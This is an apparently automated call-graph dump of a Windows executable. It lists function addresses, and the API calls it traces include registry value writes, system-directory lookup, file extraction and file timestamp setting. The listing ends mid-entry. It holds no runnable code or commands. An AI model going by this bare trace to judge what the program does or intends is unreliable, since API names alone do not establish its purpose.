GetProcessHeap HeapAlloc GetSystemDirectoryW 10837->10838 10839 c81aa6 RegOpenKeyW lstrlenW RegSetValueExW RegCloseKey 10837->10839 10840 c81e9c GetProcessHeap HeapAlloc 10838->10840 10841 c82485 GetProcessHeap HeapFree 10838->10841 10845 c86f60 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 10839->10845 10846 c82020 wsprintfW GetProcessHeap HeapAlloc 10840->10846 10842 c86f60 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 10841->10842 10844 c8249f 10842->10844 10844->10712 10848 c81e62 10845->10848 10849 c82420 6 API calls 10846->10849 10848->10712 10849->10841 10852 c8614d 10851->10852 10853 c86813 10851->10853 10852->10853 10854 c86158 10852->10854 10855 c86f60 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 10853->10855 10857 c86165 10854->10857 10858 c860b0 14 API calls 10854->10858 10856 c86825 10855->10856 10856->10723 10859 c8619d 10857->10859 10860 c86177 10857->10860 10858->10857 10862 c861a2 10859->10862 10863 c861f8 10859->10863 10861 c8617c 10860->10861 10860->10862 10864 c86f60 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 10861->10864 10865 c86f60 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 10862->10865 10868 c86203 10863->10868 10873 c86235 10863->10873 10866 c86197 10864->10866 10867 c861f2 10865->10867 10866->10723 10867->10723 10871 c85540 8 API calls 10868->10871 10869 c86293 10870 c85540 8 API calls 10869->10870 10872 c862b1 10870->10872 10875 c86225 10871->10875 10874 c85910 7 API calls 10872->10874 10873->10869 10873->10875 10876 c862cf 10874->10876 10875->10873 10877 c85540 8 API calls 10875->10877 10878 c862ee 10876->10878 10879 c862d6 10876->10879 10877->10875 10882 c862fd SetFilePointer 10878->10882 10884 c86316 10878->10884 10888 c86356 10878->10888 10880 c86f60 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 10879->10880 10881 c862e8 10880->10881 10881->10723 10882->10884 10883 c86f60 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 10885 c86371 10883->10885 10886 c84f30 6 API calls 10884->10886 10885->10723 10887 c8634b 10886->10887 10887->10888 10889 c86377 MultiByteToWideChar 10887->10889 10888->10883 10890 c863a6 10889->10890 10891 c86535 SystemTimeToFileTime LocalFileTimeToFileTime 10890->10891 10893 c8663e 10891->10893 10892 c86f60 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 10894 c8680d 10892->10894 10893->10892 10894->10723 10896 c86f68 10895->10896 10897 c86f69 IsProcessorFeaturePresent 10895->10897 10896->10702 10899 c86fb2 10897->10899 11704 c86f73 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 10899->11704 10901 c87095 10901->10702 10906 c87177 10902->10906 10904 c87191 10904->10770 10906->10904 10908 c87193 10906->10908 10942 c8c57b 10906->10942 10945 c8c546 10906->10945 10907 c874f5 10909 c88720 CallUnexpected RaiseException 10907->10909 10908->10907 10952 c88720 10908->10952 10910 c87512 10909->10910 10910->10770 10913 c85376 __CreateFrameInfo 10912->10913 10921 c8551d 10912->10921 11060 c85180 10913->11060 10915 c85393 10916 c8550e 10915->10916 10917 c853c2 10915->10917 10919 c853ad SetFilePointer 10915->10919 10918 c85514 CloseHandle 10916->10918 10916->10921 11075 c850e0 10917->11075 10918->10921 10919->10917 10921->10777 10925 c85080 6 API calls 10926 c853f9 10925->10926 10926->10916 10927 c85080 6 API calls 10926->10927 10928 c8540e 10927->10928 10928->10916 10929 c85080 6 API calls 10928->10929 10930 c85423 10929->10930 10930->10916 10931 c850e0 6 API calls 10930->10931 10932 c85458 10931->10932 10932->10916 10933 c850e0 6 API calls 10932->10933 10934 c8546a 10933->10934 10934->10916 10935 c85080 6 API calls 10934->10935 10936 c8547f 10935->10936 10936->10916 10937 c85499 10936->10937 10938 c8c546 ___std_exception_copy 15 API calls 10937->10938 10939 c854c7 10938->10939 11089 c85540 10939->11089 10941 c854fa 10941->10777 10955 c8c5a7 10942->10955 10950 c8dc7f _unexpected 10945->10950 10946 c8dcbd 10966 c8dc32 10946->10966 10947 c8dca8 RtlAllocateHeap 10949 c8dcbb 10947->10949 10947->10950 10949->10906 10950->10946 10950->10947 10951 c8c57b _unexpected 2 API calls 10950->10951 10951->10950 10953 c8873a 10952->10953 10954 c88767 RaiseException 10952->10954 10953->10954 10954->10907 10956 c8c5b3 ___scrt_is_nonwritable_in_current_image 10955->10956 10961 c8f599 EnterCriticalSection 10956->10961 10958 c8c5be __CreateFrameInfo 10962 c8c5f5 10958->10962 10961->10958 10965 c8f5e1 LeaveCriticalSection 10962->10965 10964 c8c586 10964->10906 10965->10964 10969 c8f1cc GetLastError 10966->10969 10968 c8dc37 10968->10949 10970 c8f1e8 10969->10970 10971 c8f1e2 10969->10971 10975 c8f1ec SetLastError 10970->10975 10997 c91430 10970->10997 10992 c913f1 10971->10992 10975->10968 10978 c8f219 10979 c8f221 10978->10979 10980 c8f232 10978->10980 10982 c91430 _unexpected 6 API calls 10979->10982 10981 c91430 _unexpected 6 API calls 10980->10981 10983 c8f23e 10981->10983 10984 c8f22f 10982->10984 10985 c8f259 10983->10985 10986 c8f242 10983->10986 11009 c8dc45 10984->11009 11015 c8eea9 10985->11015 10987 c91430 _unexpected 6 API calls 10986->10987 10987->10984 10991 c8dc45 __freea 12 API calls 10991->10975 11020 c912ae 10992->11020 10994 c9140d 10995 c91428 TlsGetValue 10994->10995 10996 c91416 10994->10996 10996->10970 10998 c912ae _unexpected 5 API calls 10997->10998 10999 c9144c 10998->10999 11000 c9146a TlsSetValue 10999->11000 11001 c8f204 10999->11001 11001->10975 11002 c8d8f2 11001->11002 11007 c8d8ff _unexpected 11002->11007 11003 c8d93f 11006 c8dc32 __floor_pentium4 13 API calls 11003->11006 11004 c8d92a HeapAlloc 11005 c8d93d 11004->11005 11004->11007 11005->10978 11006->11005 11007->11003 11007->11004 11008 c8c57b _unexpected 2 API calls 11007->11008 11008->11007 11010 c8dc50 RtlFreeHeap 11009->11010 11014 c8dc7a 11009->11014 11011 c8dc65 GetLastError 11010->11011 11010->11014 11012 c8dc72 __freea 11011->11012 11013 c8dc32 __floor_pentium4 12 API calls 11012->11013 11013->11014 11014->10975 11034 c8ed3d 11015->11034 11021 c912de 11020->11021 11025 c912da _unexpected 11020->11025 11021->11025 11026 c911e3 11021->11026 11024 c912f8 GetProcAddress 11024->11025 11025->10994 11032 c911f4 ___vcrt_FlsFree 11026->11032 11027 c9128a 11027->11024 11027->11025 11028 c91212 LoadLibraryExW 11029 c9122d GetLastError 11028->11029 11030 c91291 11028->11030 11029->11032 11030->11027 11031 c912a3 FreeLibrary 11030->11031 11031->11027 11032->11027 11032->11028 11033 c91260 LoadLibraryExW 11032->11033 11033->11030 11033->11032 11035 c8ed49 ___scrt_is_nonwritable_in_current_image 11034->11035 11048 c8f599 EnterCriticalSection 11035->11048 11037 c8ed53 11049 c8ed83 11037->11049 11040 c8ee4f 11041 c8ee5b ___scrt_is_nonwritable_in_current_image 11040->11041 11052 c8f599 EnterCriticalSection 11041->11052 11043 c8ee65 11053 c8f030 11043->11053 11045 c8ee7d 11057 c8ee9d 11045->11057 11048->11037 11050 c8f5e1 __CreateFrameInfo LeaveCriticalSection 11049->11050 11051 c8ed71 11050->11051 11051->11040 11052->11043 11054 c8f066 _unexpected 11053->11054 11055 c8f03f _unexpected 11053->11055 11054->11045 11055->11054 11056 c90e92 _unexpected 14 API calls 11055->11056 11056->11054 11058 c8f5e1 __CreateFrameInfo LeaveCriticalSection 11057->11058 11059 c8ee8b 11058->11059 11059->10991 11064 c851a6 11060->11064 11061 c85212 11062 c86f60 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 11061->11062 11063 c85222 11062->11063 11063->10915 11064->11061 11065 c8c546 ___std_exception_copy 15 API calls 11064->11065 11066 c85206 11065->11066 11066->11061 11074 c85226 __InternalCxxFrameHandler 11066->11074 11067 c85339 11146 c8c52b 11067->11146 11070 c8527a SetFilePointer 11070->11074 11071 c86f60 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 11073 c85352 11071->11073 11072 c8529f ReadFile 11072->11074 11073->10915 11074->11067 11074->11070 11074->11072 11149 c84fd0 11075->11149 11077 c850f9 11078 c84fd0 6 API calls 11077->11078 11082 c8510f 11077->11082 11078->11082 11079 c84fd0 6 API calls 11080 c8512a 11079->11080 11081 c85143 11080->11081 11083 c84fd0 6 API calls 11080->11083 11081->10916 11084 c85080 11081->11084 11082->11079 11082->11080 11083->11081 11085 c84fd0 6 API calls 11084->11085 11086 c85095 11085->11086 11087 c850ab 11086->11087 11088 c84fd0 6 API calls 11086->11088 11087->10916 11087->10925 11088->11087 11090 c8555e 11089->11090 11091 c85554 11089->11091 11092 c85586 11090->11092 11093 c85571 SetFilePointer 11090->11093 11094 c85593 11090->11094 11091->10941 11095 c850e0 6 API calls 11092->11095 11093->11092 11096 c84fd0 6 API calls 11094->11096 11095->11094 11097 c855b7 11096->11097 11098 c855cb 11097->11098 11099 c84fd0 6 API calls 11097->11099 11100 c84fd0 6 API calls 11098->11100 11099->11098 11101 c855f3 11100->11101 11102 c85607 11101->11102 11103 c84fd0 6 API calls 11101->11103 11104 c84fd0 6 API calls 11102->11104 11103->11102 11105 c8562f 11104->11105 11106 c85643 11105->11106 11107 c84fd0 6 API calls 11105->11107 11108 c84fd0 6 API calls 11106->11108 11107->11106 11109 c8566b 11108->11109 11110 c8567f 11109->11110 11111 c84fd0 6 API calls 11109->11111 11112 c850e0 6 API calls 11110->11112 11111->11110 11113 c856a5 11112->11113 11114 c850e0 6 API calls 11113->11114 11115 c856fd 11114->11115 11116 c850e0 6 API calls 11115->11116 11117 c8570c 11116->11117 11118 c850e0 6 API calls 11117->11118 11119 c8571b 11118->11119 11120 c84fd0 6 API calls 11119->11120 11121 c8572c 11120->11121 11122 c85740 11121->11122 11123 c84fd0 6 API calls 11121->11123 11124 c84fd0 6 API calls 11122->11124 11123->11122 11125 c85768 11124->11125 11126 c8577c 11125->11126 11127 c84fd0 6 API calls 11125->11127 11128 c84fd0 6 API calls 11126->11128 11127->11126 11129 c857a4 11128->11129 11130 c857b8 11129->11130 11131 c84fd0 6 API calls 11129->11131 11132 c84fd0 6 API calls 11130->11132 11131->11130 11133 c857e0 11132->11133 11134 c84fd0 6 API calls 11133->11134 11136 c857f4 11133->11136 11134->11136 11135 c84fd0 6 API calls 11137 c8581c 11135->11137 11136->11135 11138 c85830 11137->11138 11139 c84fd0 6 API calls 11137->11139 11140 c850e0 6 API calls 11138->11140 11139->11138 11141 c85856 11140->11141 11142 c850e0 6 API calls 11141->11142 11144 c8586a 11142->11144 11143 c8586e 11143->10941 11144->11143 11158 c84f30 11144->11158 11147 c8dc45 __freea 14 API calls 11146->11147 11148 c8533f 11147->11148 11148->11071 11150 c84ff4 ReadFile 11149->11150 11152 c8500c __InternalCxxFrameHandler 11149->11152 11150->11152 11151 c85047 11153 c86f60 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 11151->11153 11152->11151 11154 c8506b 11152->11154 11155 c8505c 11153->11155 11156 c86f60 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 11154->11156 11155->11077 11157 c8507b 11156->11157 11157->11077 11159 c84f5b ReadFile 11158->11159 11160 c84f8c __InternalCxxFrameHandler 11158->11160 11161 c84f70 11159->11161 11164 c86f60 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 11160->11164 11162 c86f60 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 11161->11162 11163 c84f88 11162->11163 11163->11143 11165 c84fc6 11164->11165 11165->11143 11171 c868d1 __InternalCxxFrameHandler 11166->11171 11172 c86851 11166->11172 11167 c869c1 11168 c86f60 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 11167->11168 11169 c869cd 11168->11169 11169->10817 11170 c868b0 GetFileAttributesW 11170->11171 11173 c868c2 CreateDirectoryW 11170->11173 11171->11167 11174 c869d1 11171->11174 11177 c86926 11171->11177 11178 c8693d 11171->11178 11172->11170 11172->11174 11175 c868a6 11172->11175 11173->11171 11176 c87097 5 API calls 11174->11176 11175->11170 11185 c869d6 11176->11185 11179 c86830 57 API calls 11177->11179 11180 c86997 GetFileAttributesW 11178->11180 11179->11178 11180->11167 11182 c869b2 CreateDirectoryW 11180->11182 11181 c86a44 11183 c86a7d 11181->11183 11184 c86a65 11181->11184 11182->11167 11189 c86a86 11183->11189 11195 c86ab8 11183->11195 11186 c86f60 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 11184->11186 11185->11181 11190 c86a20 11185->11190 11194 c8c52b ___std_exception_copy 14 API calls 11185->11194 11188 c86a77 11186->11188 11187 c86b13 11192 c86120 27 API calls 11187->11192 11188->10817 11193 c85540 8 API calls 11189->11193 11191 c86a37 11190->11191 11196 c847e0 14 API calls 11190->11196 11197 c8c52b ___std_exception_copy 14 API calls 11191->11197 11198 c86b22 11192->11198 11199 c86aa8 11193->11199 11194->11190 11195->11187 11195->11199 11196->11191 11197->11181 11202 c86b32 11198->11202 11204 c86b6e 11198->11204 11199->11195 11200 c85540 8 API calls 11199->11200 11200->11199 11201 c86830 57 API calls 11203 c86b59 11201->11203 11202->11201 11208 c86f60 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 11203->11208 11205 c86bb7 11204->11205 11206 c86dc4 11204->11206 11207 c86bd4 11204->11207 11211 c827b0 45 API calls 11205->11211 11212 c87097 5 API calls 11206->11212 11207->11205 11209 c86c25 11207->11209 11210 c86b68 11208->11210 11215 c827b0 45 API calls 11209->11215 11210->10817 11213 c86c20 11211->11213 11214 c86dc9 11212->11214 11216 c86830 57 API calls 11213->11216 11215->11213 11217 c86c50 CreateFileW 11216->11217 11218 c86c7b 11217->11218 11219 c86c93 11217->11219 11221 c86f60 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 11218->11221 11220 c85b70 22 API calls 11219->11220 11225 c86ca0 11220->11225 11222 c86c8d 11221->11222 11222->10817 11223 c85d40 7 API calls 11223->11225 11224 c86d65 11227 c86da1 CloseHandle 11224->11227 11228 c86d73 SetFileTime CloseHandle 11224->11228 11225->11223 11226 c86ce9 WriteFile 11225->11226 11229 c86d15 11225->11229 11226->11225 11226->11229 11230 c86f60 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 11227->11230 11228->11227 11229->11224 11231 c86d41 11229->11231 11233 c8c52b ___std_exception_copy 14 API calls 11229->11233 11232 c86dbe 11230->11232 11234 c86d58 11231->11234 11235 c847e0 14 API calls 11231->11235 11232->10817 11233->11231 11236 c8c52b ___std_exception_copy 14 API calls 11234->11236 11235->11234 11236->11224 11238 c85d2a 11237->11238 11239 c85b84 11237->11239 11238->10824 11239->11238 11240 c85b99 11239->11240 11333 c860b0 11239->11333 11297 c85910 11240->11297 11243 c85bab 11244 c85bb2 11243->11244 11245 c8c546 ___std_exception_copy 15 API calls 11243->11245 11244->10824 11246 c85bc8 11245->11246 11247 c85bfd 11246->11247 11248 c8c546 ___std_exception_copy 15 API calls 11246->11248 11247->10824 11249 c85bdb 11248->11249 11250 c85c0c 11249->11250 11251 c85bf7 11249->11251 11254 c85c59 11250->11254 11342 c848b0 11250->11342 11252 c8c52b ___std_exception_copy 14 API calls 11251->11252 11252->11247 11254->10824 11256 c85d69 11255->11256 11257 c86098 11256->11257 11258 c85d7f 11256->11258 11259 c86f60 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 11257->11259 11260 c85d99 11258->11260 11261 c85d83 11258->11261 11262 c860aa 11259->11262 11264 c85da0 11260->11264 11281 c85db1 __InternalCxxFrameHandler 11260->11281 11263 c86f60 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 11261->11263 11262->10824 11265 c85d95 11263->11265 11266 c86f60 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 11264->11266 11265->10824 11267 c85dad 11266->11267 11267->10824 11268 c8607b 11269 c86f60 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 11268->11269 11270 c86094 11269->11270 11270->10824 11271 c8603a 11276 c86f60 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 11271->11276 11272 c85e0f SetFilePointer 11272->11281 11273 c8604e 11277 c86f60 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 11273->11277 11275 c85e34 ReadFile 11278 c85e4a 11275->11278 11279 c8604a 11276->11279 11280 c86060 11277->11280 11278->11281 11279->10824 11280->10824 11281->11268 11281->11271 11281->11272 11281->11273 11281->11275 11282 c86064 11281->11282 11283 c86068 11281->11283 11358 c84b40 11281->11358 11282->11268 11282->11283 11284 c86f60 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 11283->11284 11285 c86077 11284->11285 11285->10824 11287 c847ec 11286->11287 11288 c84882 11286->11288 11287->11288 11366 c847d0 11287->11366 11288->10791 11291 c827cd 11290->11291 11369 c8c4ea 11291->11369 11699 c870a3 IsProcessorFeaturePresent 11294->11699 11298 c8593a 11297->11298 11299 c8595c 11297->11299 11300 c85940 SetFilePointer 11298->11300 11301 c85953 11298->11301 11302 c850e0 6 API calls 11299->11302 11300->11299 11301->11243 11303 c85969 11302->11303 11305 c84fd0 6 API calls 11303->11305 11306 c8598e 11305->11306 11307 c8599c 11306->11307 11308 c84fd0 6 API calls 11306->11308 11309 c84fd0 6 API calls 11307->11309 11308->11307 11310 c859b2 11309->11310 11311 c859c4 11310->11311 11313 c84fd0 6 API calls 11310->11313 11312 c84fd0 6 API calls 11311->11312 11314 c859e2 11312->11314 11313->11311 11315 c84fd0 6 API calls 11314->11315 11318 c859f7 11314->11318 11315->11318 11316 c850e0 6 API calls 11317 c85a40 11316->11317 11319 c850e0 6 API calls 11317->11319 11318->11316 11320 c85a54 11319->11320 11321 c850e0 6 API calls 11320->11321 11322 c85a7e 11321->11322 11323 c850e0 6 API calls 11322->11323 11324 c85aa8 11323->11324 11325 c84fd0 6 API calls 11324->11325 11326 c85ad4 11325->11326 11327 c84fd0 6 API calls 11326->11327 11328 c85ae8 11326->11328 11327->11328 11329 c84fd0 6 API calls 11328->11329 11330 c85b20 11329->11330 11331 c85b35 11330->11331 11332 c84fd0 6 API calls 11330->11332 11331->11243 11332->11331 11334 c86115 11333->11334 11335 c860bb 11333->11335 11334->11240 11335->11334 11336 c860e1 11335->11336 11337 c8c52b ___std_exception_copy 14 API calls 11335->11337 11338 c860f8 11336->11338 11339 c847e0 14 API calls 11336->11339 11337->11336 11340 c8c52b ___std_exception_copy 14 API calls 11338->11340 11339->11338 11341 c86105 11340->11341 11341->11240 11343 c848b7 11342->11343 11350 c848bc __CreateFrameInfo 11342->11350 11343->11254 11344 c8490f 11344->11254 11345 c849af 11346 c847e0 14 API calls 11345->11346 11347 c84a2b 11346->11347 11347->11254 11348 c849a4 11348->11345 11349 c8c52b ___std_exception_copy 14 API calls 11348->11349 11349->11345 11350->11344 11350->11345 11350->11348 11351 c849dc 11350->11351 11352 c84a34 11350->11352 11351->11348 11353 c8c52b ___std_exception_copy 14 API calls 11351->11353 11354 c84ac7 11352->11354 11355 c8c52b ___std_exception_copy 14 API calls 11352->11355 11356 c84aed 11352->11356 11353->11348 11354->11356 11357 c8c52b ___std_exception_copy 14 API calls 11354->11357 11355->11354 11356->11254 11357->11356 11359 c84dd9 11358->11359 11361 c84b51 11358->11361 11359->11281 11361->11359 11362 c82fb0 11361->11362 11364 c82fe5 __InternalCxxFrameHandler 11362->11364 11363 c83c20 IsProcessorFeaturePresent SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 11363->11364 11364->11363 11365 c83996 11364->11365 11365->11361 11367 c8c52b ___std_exception_copy 14 API calls 11366->11367 11368 c847db 11367->11368 11368->11288 11370 c8c4fe ___std_exception_copy 11369->11370 11375 c8a27b 11370->11375 11376 c8a2ca 11375->11376 11377 c8a2a7 11375->11377 11376->11377 11380 c8a2d2 11376->11380 11392 c8daf7 11377->11392 11379 c8a2bf 11381 c86f60 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 11379->11381 11401 c8b736 11380->11401 11382 c8a3fc 11381->11382 11386 c8b4a0 11382->11386 11387 c8b4ac 11386->11387 11388 c8b4c3 11387->11388 11389 c8b660 ___std_exception_copy 41 API calls 11387->11389 11390 c827d7 11388->11390 11391 c8b660 ___std_exception_copy 41 API calls 11388->11391 11389->11388 11390->10813 11391->11390 11393 c8db0e 11392->11393 11394 c8db07 11392->11394 11397 c8db1c 11393->11397 11418 c8d94f 11393->11418 11414 c8b610 GetLastError 11394->11414 11397->11379 11398 c8db43 11398->11397 11421 c8db84 IsProcessorFeaturePresent 11398->11421 11400 c8db73 11453 c8c426 11401->11453 11404 c8b756 11405 c8daf7 ___std_exception_copy 29 API calls 11404->11405 11407 c8a353 11405->11407 11406 c8b77d 11406->11407 11457 c8b6bc 11406->11457 11460 c8b972 11406->11460 11501 c8bafc 11406->11501 11411 c8b4dc 11407->11411 11412 c8dc45 __freea 14 API calls 11411->11412 11413 c8b4ec 11412->11413 11413->11379 11415 c8b629 11414->11415 11425 c8f27d 11415->11425 11419 c8d95a GetLastError SetLastError 11418->11419 11420 c8d973 11418->11420 11419->11398 11420->11398 11422 c8db90 11421->11422 11447 c8d978 11422->11447 11426 c8f296 11425->11426 11427 c8f290 11425->11427 11428 c91430 _unexpected 6 API calls 11426->11428 11431 c8b645 SetLastError 11426->11431 11429 c913f1 _unexpected 6 API calls 11427->11429 11430 c8f2b0 11428->11430 11429->11426 11430->11431 11432 c8d8f2 _unexpected 14 API calls 11430->11432 11431->11393 11433 c8f2c0 11432->11433 11434 c8f2c8 11433->11434 11435 c8f2dd 11433->11435 11436 c91430 _unexpected 6 API calls 11434->11436 11437 c91430 _unexpected 6 API calls 11435->11437 11438 c8f2d4 11436->11438 11439 c8f2e9 11437->11439 11444 c8dc45 __freea 14 API calls 11438->11444 11440 c8f2fc 11439->11440 11441 c8f2ed 11439->11441 11443 c8eea9 _unexpected 14 API calls 11440->11443 11442 c91430 _unexpected 6 API calls 11441->11442 11442->11438 11445 c8f307 11443->11445 11444->11431 11446 c8dc45 __freea 14 API calls 11445->11446 11446->11431 11448 c8d994 __CreateFrameInfo 11447->11448 11449 c8d9c0 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 11448->11449 11452 c8da91 __CreateFrameInfo 11449->11452 11450 c86f60 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 11451 c8daaf GetCurrentProcess TerminateProcess 11450->11451 11451->11400 11452->11450 11454 c8b74b 11453->11454 11455 c8c431 11453->11455 11454->11404 11454->11406 11454->11407 11456 c8daf7 ___std_exception_copy 29 API calls 11455->11456 11456->11454 11537 c8a5b4 11457->11537 11459 c8b6f9 11459->11406 11461 c8b998 11460->11461 11462 c8b980 11460->11462 11465 c8daf7 ___std_exception_copy 29 API calls 11461->11465 11482 c8b9d9 11461->11482 11463 c8bb2a 11462->11463 11464 c8bb94 11462->11464 11462->11482 11469 c8bbbc 11463->11469 11470 c8bb30 11463->11470 11467 c8bb99 11464->11467 11468 c8bbd3 11464->11468 11466 c8b9cd 11465->11466 11466->11406 11471 c8bbca 11467->11471 11472 c8bb9b 11467->11472 11473 c8bbd8 11468->11473 11474 c8bbf2 11468->11474 11587 c8ad37 11469->11587 11475 c8bb61 11470->11475 11476 c8bb35 11470->11476 11594 c8c27b 11471->11594 11489 c8bbaa 11472->11489 11490 c8bb43 11472->11490 11478 c8bbe9 11473->11478 11479 c8bbdd 11473->11479 11602 c8c298 11474->11602 11481 c8bb3b 11475->11481 11486 c8bb89 11475->11486 11476->11478 11476->11481 11598 c8c2ae 11478->11598 11479->11469 11479->11486 11487 c8bb6e 11481->11487 11481->11490 11497 c8bb5c 11481->11497 11482->11406 11499 c8bbfd 11486->11499 11576 c8aec9 11486->11576 11487->11499 11570 c8c14e 11487->11570 11489->11469 11492 c8bbae 11489->11492 11490->11499 11560 c8bfa7 11490->11560 11492->11499 11583 c8c1f6 11492->11583 11493 c86f60 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 11494 c8beee 11493->11494 11494->11406 11497->11499 11500 c8bddd 11497->11500 11605 c8c3b0 11497->11605 11499->11493 11500->11499 11612 c8ea92 11500->11612 11502 c8bb2a 11501->11502 11503 c8bb94 11501->11503 11506 c8bbbc 11502->11506 11507 c8bb30 11502->11507 11504 c8bb99 11503->11504 11505 c8bbd3 11503->11505 11508 c8bbca 11504->11508 11509 c8bb9b 11504->11509 11510 c8bbd8 11505->11510 11511 c8bbf2 11505->11511 11520 c8ad37 30 API calls 11506->11520 11512 c8bb61 11507->11512 11513 c8bb35 11507->11513 11514 c8c27b 30 API calls 11508->11514 11515 c8bb43 11509->11515 11525 c8bbaa 11509->11525 11516 c8bbe9 11510->11516 11517 c8bbdd 11510->11517 11518 c8c298 30 API calls 11511->11518 11519 c8bb3b 11512->11519 11522 c8bb89 11512->11522 11513->11516 11513->11519 11533 c8bb5c 11514->11533 11521 c8bfa7 44 API calls 11515->11521 11535 c8bbfd 11515->11535 11523 c8c2ae 41 API calls 11516->11523 11517->11506 11517->11522 11518->11533 11519->11515 11526 c8bb6e 11519->11526 11519->11533 11520->11533 11521->11533 11524 c8aec9 30 API calls 11522->11524 11522->11535 11523->11533 11524->11533 11525->11506 11527 c8bbae 11525->11527 11528 c8c14e 42 API calls 11526->11528 11526->11535 11531 c8c1f6 29 API calls 11527->11531 11527->11535 11528->11533 11529 c86f60 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 11530 c8beee 11529->11530 11530->11406 11531->11533 11532 c8c3b0 ___scrt_uninitialize_crt 41 API calls 11536 c8bddd 11532->11536 11533->11532 11533->11535 11533->11536 11534 c8ea92 ___scrt_uninitialize_crt 42 API calls 11534->11536 11535->11529 11536->11534 11536->11535 11547 c8c40b 11537->11547 11539 c8a5ca 11540 c8a5df 11539->11540 11542 c8a612 11539->11542 11546 c8a5fa 11539->11546 11541 c8daf7 ___std_exception_copy 29 API calls 11540->11541 11541->11546 11543 c8a911 11542->11543 11554 c8c377 11542->11554 11544 c8c377 41 API calls 11543->11544 11544->11546 11546->11459 11548 c8c410 11547->11548 11549 c8c423 11547->11549 11550 c8dc32 __floor_pentium4 14 API calls 11548->11550 11549->11539 11551 c8c415 11550->11551 11552 c8db74 ___std_exception_copy 41 API calls 11551->11552 11553 c8c420 11552->11553 11553->11539 11555 c8c38c 11554->11555 11556 c8c3a1 11554->11556 11555->11556 11557 c8dc32 __floor_pentium4 14 API calls 11555->11557 11556->11543 11558 c8c396 11557->11558 11559 c8db74 ___std_exception_copy 41 API calls 11558->11559 11559->11556 11561 c8bfc8 11560->11561 11624 c8a42f 11561->11624 11563 c8c00a 11635 c8e911 11563->11635 11566 c8c0fc 11566->11497 11567 c8c3b0 ___scrt_uninitialize_crt 41 API calls 11568 c8c0c0 11567->11568 11568->11566 11569 c8c3b0 ___scrt_uninitialize_crt 41 API calls 11568->11569 11569->11566 11571 c8c17b 11570->11571 11572 c8c197 11571->11572 11573 c8c3b0 ___scrt_uninitialize_crt 41 API calls 11571->11573 11575 c8c1b8 11571->11575 11574 c8ea92 ___scrt_uninitialize_crt 42 API calls 11572->11574 11573->11572 11574->11575 11575->11497 11577 c8aede 11576->11577 11578 c8af00 11577->11578 11580 c8af27 11577->11580 11579 c8daf7 ___std_exception_copy 29 API calls 11578->11579 11582 c8af1d 11579->11582 11580->11582 11654 c8a4b0 11580->11654 11582->11497 11586 c8c20c 11583->11586 11584 c8daf7 ___std_exception_copy 29 API calls 11585 c8c22d 11584->11585 11585->11497 11586->11584 11586->11585 11588 c8ad4c 11587->11588 11589 c8ad6e 11588->11589 11592 c8ad95 11588->11592 11590 c8daf7 ___std_exception_copy 29 API calls 11589->11590 11591 c8ad8b 11590->11591 11591->11497 11592->11591 11593 c8a4b0 15 API calls 11592->11593 11593->11591 11595 c8c287 11594->11595 11665 c8aba5 11595->11665 11597 c8c297 11597->11497 11599 c8c2cb 11598->11599 11601 c8c2e9 11599->11601 11672 c8c322 11599->11672 11601->11497 11603 c8aec9 30 API calls 11602->11603 11604 c8c2ad 11603->11604 11604->11497 11676 c8b660 11605->11676 11614 c8eaa6 11612->11614 11621 c8eab6 11612->11621 11613 c8eadb 11616 c8eaec 11613->11616 11617 c8eb0f 11613->11617 11614->11613 11615 c8c3b0 ___scrt_uninitialize_crt 41 API calls 11614->11615 11614->11621 11615->11613 11693 c93e0c 11616->11693 11619 c8eb8b 11617->11619 11620 c8eb37 11617->11620 11617->11621 11622 c9059a ___scrt_uninitialize_crt MultiByteToWideChar 11619->11622 11620->11621 11696 c9059a 11620->11696 11621->11500 11622->11621 11625 c8a456 11624->11625 11634 c8a444 11624->11634 11626 c8dc7f 15 API calls 11625->11626 11625->11634 11627 c8a47a 11626->11627 11628 c8a48d 11627->11628 11629 c8a482 11627->11629 11630 c8b4f6 14 API calls 11628->11630 11631 c8dc45 __freea 14 API calls 11629->11631 11632 c8a498 11630->11632 11631->11634 11633 c8dc45 __freea 14 API calls 11632->11633 11633->11634 11634->11563 11636 c8e946 11635->11636 11637 c8e922 11635->11637 11636->11637 11639 c8e979 11636->11639 11638 c8daf7 ___std_exception_copy 29 API calls 11637->11638 11653 c8c09d 11638->11653 11640 c8e9b2 